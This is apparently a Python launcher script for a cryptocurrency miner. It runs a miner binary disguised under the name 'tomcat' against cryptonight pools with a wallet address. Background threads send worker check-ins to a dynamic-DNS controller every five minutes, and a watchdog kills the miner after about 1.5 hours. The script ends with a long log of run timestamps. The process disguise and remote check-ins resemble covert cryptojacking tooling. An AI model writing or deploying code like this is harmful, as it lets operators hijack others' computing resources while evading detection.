import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:37:07.668894
#2018-02-17 17:26:08.005459
#2018-02-17 19:15:07.882225
#2018-02-17 21:06:06.563754
#2018-02-17 22:50:07.757927
#2018-02-18 00:35:07.246644
#2018-02-18 02:25:06.911227
#2018-02-18 04:12:01.294900
#2018-02-18 06:03:02.124574
#2018-02-18 07:52:02.148291
#2018-02-18 09:39:01.480731
#2018-02-18 11:24:06.806066
#2018-02-18 13:10:06.733389
#2018-02-18 14:58:05.506430
#2018-02-18 16:47:06.506527
#2018-02-18 18:35:06.538314
#2018-02-18 20:23:03.561475
#2018-02-18 22:09:05.330688
#2018-02-18 23:57:03.392191
#2018-02-19 01:44:05.093751
#2018-02-19 03:33:01.805440
#2018-02-19 05:18:06.278019
#2018-02-19 07:04:07.769853
#2018-02-19 08:53:06.353519
#2018-02-19 10:42:08.456398
#2018-02-19 12:29:08.601881
#2018-02-19 14:17:06.563007
#2018-02-19 16:06:01.745000
#2018-02-19 17:53:08.079647
#2018-02-19 19:40:08.319043
#2018-02-19 21:28:06.777764
#2018-02-19 23:14:01.840686
#2018-02-20 00:59:05.065838
#2018-02-20 02:48:05.207446
#2018-02-20 04:34:07.866968
#2018-02-20 06:18:08.272068
#2018-02-20 08:03:05.669579
#2018-02-20 09:48:02.007193
#2018-02-20 11:32:07.248454
#2018-02-20 13:20:06.586234
#2018-02-20 15:04:08.605635
#2018-02-20 16:49:08.670584
#2018-02-20 18:37:07.209577
#2018-02-20 20:28:07.761915
#2018-02-20 22:13:01.383307
#2018-02-20 23:53:07.487749
#2018-02-21 01:38:06.112647
#2018-02-21 03:25:01.642599
#2018-02-21 05:12:02.008902
#2018-02-21 07:01:04.030503
#2018-02-21 08:47:01.401474
#2018-02-21 10:33:08.243339
#2018-02-21 12:21:10.506977
#2018-02-21 14:09:07.250816
#2018-02-21 15:56:04.375535
#2018-02-21 17:47:05.955949
#2018-02-21 19:32:08.295900
#2018-02-21 21:20:10.735201
#2018-02-21 23:07:07.317206
#2018-02-22 00:56:03.562038
#2018-02-22 02:42:06.253128
#2018-02-22 04:28:07.252275
#2018-02-22 06:13:03.774621
#2018-02-22 07:57:04.351012
#2018-02-22 09:46:04.122070
#2018-02-22 11:31:08.358862
#2018-02-22 13:17:04.655796
#2018-02-22 15:06:07.351700
#2018-02-22 16:49:04.741809
#2018-02-22 18:37:01.280703
#2018-02-22 20:27:06.189791
#2018-02-22 22:14:05.379685
#2018-02-23 00:01:06.270521
#2018-02-23 01:49:07.880940
#2018-02-23 03:40:08.613902
#2018-02-23 05:25:09.096036
#2018-02-23 07:11:07.425760
#2018-02-23 09:16:05.257247
#2018-02-23 11:22:06.778903
#2018-02-23 13:12:08.180629
#2018-02-23 14:57:02.079539
#2018-02-23 16:45:08.042604
#2018-02-23 18:33:06.855986
#2018-02-23 20:19:08.047810
#2018-02-23 22:07:01.437617
#2018-02-23 23:55:06.497977
#2018-02-24 01:44:09.653576
#2018-02-24 03:36:05.552162
#2018-02-24 05:21:07.719951
#2018-02-24 07:09:05.170546
#2018-02-24 08:56:06.094905
#2018-02-24 10:53:01.452269
#2018-02-24 12:40:07.262751
#2018-02-24 14:28:06.324314
#2018-02-24 16:16:07.388924
#2018-02-24 18:09:05.763366
#2018-02-24 19:56:07.043932
#2018-02-24 21:40:06.720147
#2018-02-25 00:31:03.458515
#2018-02-25 04:11:05.535854
#2018-02-25 07:42:04.409934